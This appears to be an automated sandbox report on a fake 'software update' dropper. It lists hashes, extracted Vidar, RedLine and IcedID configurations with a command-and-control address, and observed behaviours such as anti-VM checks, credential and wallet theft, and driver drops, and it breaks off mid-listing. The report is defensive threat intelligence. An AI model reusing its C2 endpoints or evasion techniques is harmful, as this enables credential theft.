Analysis
-
max time kernel
86s -
max time network
719s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
21-10-2021 13:12
Static task
static1
General
-
Target
Software-update-patc_579570356.sfx.exe
-
Size
28.5MB
-
MD5
b64a9d5a67665275d9cbb1d320f1361a
-
SHA1
3935a3994cb12a69ece3517a63eb35820761feaf
-
SHA256
28b8658e761beebef9578a13e60f231b7bd5af81107210c06ac108276e9447b9
-
SHA512
261b47e9218c1531b31ea4ba9a7aa89d5a28b7f0c4c8e4b8196acec7cbd107b31c169eb2fdcde324eeb5e8427298508d39260da82026125c199b2d146cf71d37
Malware Config
Extracted
vidar
41.5
223
https://mas.to/@xeroxxx
-
profile_id
223
Extracted
redline
123ikjrvd
87.251.71.82:80
Extracted
icedid
1926014661
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 672 2496 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4516 2496 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/5040-306-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/5040-307-0x000000000041852A-mapping.dmp family_redline behavioral1/memory/3668-351-0x0000000000438ECE-mapping.dmp family_redline -
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\is-D0LKD.tmp\ApiTool.dll acprotect \Users\Admin\AppData\Local\Temp\is-D0LKD.tmp\ApiTool.dll acprotect -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2964-256-0x0000000000400000-0x00000000009A4000-memory.dmp family_vidar -
Blocklisted process makes network request 9 IoCs
Processes:
MsiExec.execmd.exeflow pid process 77 2284 MsiExec.exe 79 2284 MsiExec.exe 81 2284 MsiExec.exe 83 2284 MsiExec.exe 85 2284 MsiExec.exe 86 2284 MsiExec.exe 86 2284 cmd.exe 86 2284 cmd.exe 86 2284 cmd.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
Processes:
DrvInst.exedescription ioc process File opened for modification C:\Windows\System32\drivers\SETA14D.tmp DrvInst.exe File created C:\Windows\System32\drivers\SETA14D.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe -
Executes dropped EXE 28 IoCs
Processes:
Recovery_Toolbox_For_Cd_Free_2_serial_keygen.exeSoftware-update-patc_535592163.exeSoftware-update-patc_535592163.tmpExercitationem.exeUR1E1OJkSMSPSwU0.exeUR1E1OJkSMSPSwU0.exekahRa2R1.exeoAKAmWkbAngMjKcBt.exevpn.exevpn.tmpSoftware-update-patc_988440081.exeSoftware-update-patc_988440081.tmpZembra.exeSoftware-update-patc_988440081.exetapinstall.exeSoftware-update-patc_988440081.tmptapinstall.exemask_svc.exemask_svc.exemask_svc.exeSoftware-update-patc_612604768.exeSoftware-update-patc_612604768.tmpConhost.exe5.exeSoftware-update-patc_612604768.exeSoftware-update-patc_612604768.tmpZembraBro.exeQuibusdam.exepid process 4556 Recovery_Toolbox_For_Cd_Free_2_serial_keygen.exe 644 Software-update-patc_535592163.exe 1196 Software-update-patc_535592163.tmp 1088 Exercitationem.exe 1312 UR1E1OJkSMSPSwU0.exe 4916 UR1E1OJkSMSPSwU0.exe 4720 kahRa2R1.exe 4880 oAKAmWkbAngMjKcBt.exe 4024 vpn.exe 4536 vpn.tmp 1132 Software-update-patc_988440081.exe 5024 Software-update-patc_988440081.tmp 2964 Zembra.exe 3684 Software-update-patc_988440081.exe 4208 tapinstall.exe 4196 Software-update-patc_988440081.tmp 3156 tapinstall.exe 1844 mask_svc.exe 908 mask_svc.exe 1604 mask_svc.exe 2120 Software-update-patc_612604768.exe 2336 Software-update-patc_612604768.tmp 4968 Conhost.exe 1680 5.exe 5056 Software-update-patc_612604768.exe 4336 Software-update-patc_612604768.tmp 5040 ZembraBro.exe 4080 Quibusdam.exe -
Modifies Windows Firewall 1 TTPs
-
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\is-D0LKD.tmp\ApiTool.dll upx \Users\Admin\AppData\Local\Temp\is-D0LKD.tmp\ApiTool.dll upx -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Zembra.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Zembra.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Zembra.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
Zembra.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Wine Zembra.exe -
Loads dropped DLL 34 IoCs
Processes:
Software-update-patc_535592163.tmpoAKAmWkbAngMjKcBt.exevpn.tmpSoftware-update-patc_988440081.tmpMsiExec.exeMsiExec.exeSoftware-update-patc_988440081.tmpZembra.exeSoftware-update-patc_612604768.tmpmask_svc.exeSoftware-update-patc_612604768.tmppid process 1196 Software-update-patc_535592163.tmp 4880 oAKAmWkbAngMjKcBt.exe 4536 vpn.tmp 4536 vpn.tmp 5024 Software-update-patc_988440081.tmp 1788 MsiExec.exe 1788 MsiExec.exe 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 2284 MsiExec.exe 2284 MsiExec.exe 2284 MsiExec.exe 2284 MsiExec.exe 2284 MsiExec.exe 4196 Software-update-patc_988440081.tmp 2284 MsiExec.exe 2284 MsiExec.exe 2284 MsiExec.exe 2284 MsiExec.exe 2284 MsiExec.exe 2964 Zembra.exe 2964 Zembra.exe 2336 Software-update-patc_612604768.tmp 1604 mask_svc.exe 1604 mask_svc.exe 1604 mask_svc.exe 1604 mask_svc.exe 1604 mask_svc.exe 1604 mask_svc.exe 4336 Software-update-patc_612604768.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Zembra.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Zembra.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
oAKAmWkbAngMjKcBt.exemsiexec.exedescription ioc process File opened (read-only) \??\T: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\V: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\Q: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\U: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\R: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\Z: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\I: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\J: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\K: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\L: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\F: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\M: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\X: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\N: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\Y: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\W: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\B: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\G: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\O: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\S: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: oAKAmWkbAngMjKcBt.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 160 ipinfo.io 165 ip-api.com 178 ipinfo.io 334 ipinfo.io 555 ipinfo.io 161 ipinfo.io 395 ipinfo.io 397 ipinfo.io 554 ipinfo.io -
Drops file in System32 directory 17 IoCs
Processes:
DrvInst.exeDrvInst.exetapinstall.exedescription ioc process File opened for modification C:\Windows\System32\DriverStore\Temp\{2b9325fb-863c-0044-a585-e6495665f331}\SET9DC3.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2b9325fb-863c-0044-a585-e6495665f331}\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2b9325fb-863c-0044-a585-e6495665f331}\SET9DC4.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{2b9325fb-863c-0044-a585-e6495665f331}\SET9DC3.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2b9325fb-863c-0044-a585-e6495665f331} DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{2b9325fb-863c-0044-a585-e6495665f331}\SET9DC4.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2b9325fb-863c-0044-a585-e6495665f331}\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2b9325fb-863c-0044-a585-e6495665f331}\SET9DC5.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{2b9325fb-863c-0044-a585-e6495665f331}\SET9DC5.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2b9325fb-863c-0044-a585-e6495665f331}\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
Zembra.exemask_svc.exemask_svc.exemask_svc.exepid process 2964 Zembra.exe 1844 mask_svc.exe 908 mask_svc.exe 1604 mask_svc.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
UR1E1OJkSMSPSwU0.exe5.exedescription pid process target process PID 1312 set thread context of 4916 1312 UR1E1OJkSMSPSwU0.exe UR1E1OJkSMSPSwU0.exe PID 1680 set thread context of 5040 1680 5.exe ZembraBro.exe -
autoit_exe 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\B4c6oRcW\kahRa2R1.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\B4c6oRcW\kahRa2R1.exe autoit_exe -
Drops file in Program Files directory 64 IoCs
Processes:
Software-update-patc_535592163.tmpvpn.tmpSoftware-update-patc_612604768.tmpSoftware-update-patc_988440081.tmpSoftware-update-patc_612604768.tmpSoftware-update-patc_988440081.tmpdescription ioc process File opened for modification C:\Program Files (x86)\Ut\unins000.dat Software-update-patc_535592163.tmp File created C:\Program Files (x86)\MaskVPN\is-HKTVJ.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-SCE9C.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-Q65C1.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-290P5.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-83JLN.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File created C:\Program Files (x86)\Dolore\minus\is-H35Q0.tmp Software-update-patc_612604768.tmp File created C:\Program Files (x86)\Ut\sed\is-OALV3.tmp Software-update-patc_535592163.tmp File created C:\Program Files (x86)\Ut\is-KFB0U.tmp Software-update-patc_988440081.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-9SNCV.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-DHBUP.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-O5QNI.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-9U2VP.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-3GU03.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-D22U8.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-NN0LO.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Dolore\unins000.dat Software-update-patc_612604768.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-EKM3P.tmp vpn.tmp File created C:\Program Files (x86)\Ut\quam\is-BEU30.tmp Software-update-patc_535592163.tmp File created C:\Program Files (x86)\Ut\quam\is-80L6D.tmp Software-update-patc_535592163.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll vpn.tmp File opened for modification C:\Program Files (x86)\Dolore\quia\Quibusdam.exe Software-update-patc_612604768.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-EU5MI.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-2TCSS.tmp vpn.tmp File created C:\Program Files (x86)\Ut\quia\is-0ONTL.tmp Software-update-patc_535592163.tmp File created C:\Program Files (x86)\MaskVPN\is-2ST2R.tmp vpn.tmp File created C:\Program Files (x86)\Dolore\is-UTBU6.tmp Software-update-patc_612604768.tmp File created C:\Program Files (x86)\Dolore\consectetur\is-BIC3Q.tmp Software-update-patc_612604768.tmp File created C:\Program Files (x86)\Ut\quia\is-7SPH9.tmp Software-update-patc_535592163.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-2HAF1.tmp vpn.tmp File created C:\Program Files (x86)\Ut\quam\is-AAQLN.tmp Software-update-patc_535592163.tmp File created C:\Program Files (x86)\Dolore\in\is-V8F3N.tmp Software-update-patc_612604768.tmp File created C:\Program Files (x86)\Dolore\minus\is-RIR0K.tmp Software-update-patc_612604768.tmp File created C:\Program Files (x86)\MaskVPN\is-40APF.tmp vpn.tmp File created C:\Program Files (x86)\Dolore\consectetur\is-01BKM.tmp Software-update-patc_612604768.tmp File created C:\Program Files (x86)\Dolore\quia\is-T3LMG.tmp Software-update-patc_612604768.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File created C:\Program Files (x86)\Ut\quam\is-NDI2I.tmp Software-update-patc_535592163.tmp File created C:\Program Files (x86)\MaskVPN\is-TBBFA.tmp vpn.tmp File created C:\Program Files (x86)\Ut\magni\is-EN1SQ.tmp Software-update-patc_988440081.tmp File created C:\Program Files (x86)\Dolore\in\is-R3306.tmp Software-update-patc_612604768.tmp File created C:\Program Files (x86)\Ut\quia\is-6AHES.tmp Software-update-patc_535592163.tmp File created C:\Program Files (x86)\MaskVPN\is-L8HEU.tmp vpn.tmp File created C:\Program Files (x86)\Dolore\quia\is-RSP80.tmp Software-update-patc_612604768.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libCommon.dll vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\mask_svc.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-JN6J2.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-EIHGF.tmp vpn.tmp File created C:\Program Files (x86)\Dolore\in\is-1EMSC.tmp Software-update-patc_612604768.tmp File created C:\Program Files (x86)\Dolore\is-484P6.tmp Software-update-patc_612604768.tmp File created C:\Program Files (x86)\Dolore\in\is-MDFRB.tmp Software-update-patc_612604768.tmp File opened for modification C:\Program Files (x86)\Ut\quam\Exercitationem.exe Software-update-patc_535592163.tmp File created C:\Program Files (x86)\Ut\magni\is-EEL29.tmp Software-update-patc_535592163.tmp File created C:\Program Files (x86)\Ut\sed\is-TP6UB.tmp Software-update-patc_535592163.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-F01TK.tmp vpn.tmp File created C:\Program Files (x86)\Dolore\quos\is-9AON5.tmp Software-update-patc_612604768.tmp File created C:\Program Files (x86)\MaskVPN\is-EDLVS.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-9DK99.tmp vpn.tmp -
Drops file in Windows directory 26 IoCs
Processes:
msiexec.exeDrvInst.exeDrvInst.exesvchost.exetapinstall.exeMicrosoftEdge.exedescription ioc process File opened for modification C:\Windows\Installer\MSI91FF.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9D4D.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Installer\MSI9FDF.tmp msiexec.exe File created C:\Windows\Installer\f76873d.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI8DD5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9087.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9CBF.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File created C:\Windows\INF\oem2.PNF DrvInst.exe File opened for modification C:\Windows\Installer\MSIA129.tmp msiexec.exe File opened for modification C:\Windows\Installer\f76873d.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI8F0F.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File created C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI8AD7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9423.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9DBB.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 18 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 6424 6020 WerFault.exe 8.exe 7428 4500 WerFault.exe setup.exe 7564 1840 WerFault.exe rDuszRYcVapYdiu1d2yWoFFu.exe 7964 1840 WerFault.exe rDuszRYcVapYdiu1d2yWoFFu.exe 7980 4500 WerFault.exe setup.exe 5548 4500 WerFault.exe setup.exe 3680 1840 WerFault.exe rDuszRYcVapYdiu1d2yWoFFu.exe 2112 4500 WerFault.exe setup.exe 7672 7096 WerFault.exe tzhXPiwxaSuXjvgggWPEBDSn.exe 7876 1840 WerFault.exe rDuszRYcVapYdiu1d2yWoFFu.exe 5420 4500 WerFault.exe setup.exe 8116 7096 WerFault.exe tzhXPiwxaSuXjvgggWPEBDSn.exe 7496 7096 WerFault.exe tzhXPiwxaSuXjvgggWPEBDSn.exe 6972 7096 WerFault.exe tzhXPiwxaSuXjvgggWPEBDSn.exe 4400 1840 WerFault.exe rDuszRYcVapYdiu1d2yWoFFu.exe 6272 4500 WerFault.exe setup.exe 5064 7096 WerFault.exe tzhXPiwxaSuXjvgggWPEBDSn.exe 12860 14160 WerFault.exe E40E.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exeDrvInst.exetapinstall.exetapinstall.exeDrvInst.exesvchost.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\UpperFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\UpperFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Mfg svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key value queried 